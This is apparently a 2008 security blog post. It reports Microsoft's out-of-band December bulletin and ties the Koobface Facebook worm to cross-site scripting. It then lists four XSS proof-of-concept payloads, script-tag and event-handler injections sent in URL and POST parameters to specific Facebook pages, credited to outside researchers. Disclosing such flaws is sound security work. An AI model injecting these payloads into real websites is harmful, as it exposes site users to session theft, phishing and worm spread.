iThreats

This is an advance notification of an out-of-band security bulletin that Microsoft is intending to release on December 17, 2008.

The full version of the Microsoft Security Bulletin Advance Notification for December 2008 can be found at http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx.

This resolves newly discovered vulnerability such as the critical IE7 flaw.

Facebook worm aka “Koobface” exploiting highly critical XSS vulnerability as recently discovered. It seems these guys successfully mess around in facebook as it has been around for months now. 

Further Reading xssed.com

XSS #1 with POST (by Zeitjak) 

http://www.new.facebook.com/r.php

POST: reg_email__=”onmouseover=”alert(‘XSS – ZJ’)”foo=”bar

XSS #2 with POST (by David Wharton) 

https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST: 

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (by DaiMon)

http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

This one works on another IP (67.228.87.82) and can’t be used for a worm, except a phishing one.

XSS #4 with POST (by p3lo)

http://developers.facebook.com/tools.php?fbml

POST: 

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

–>> Hmmm nice PoC to play around.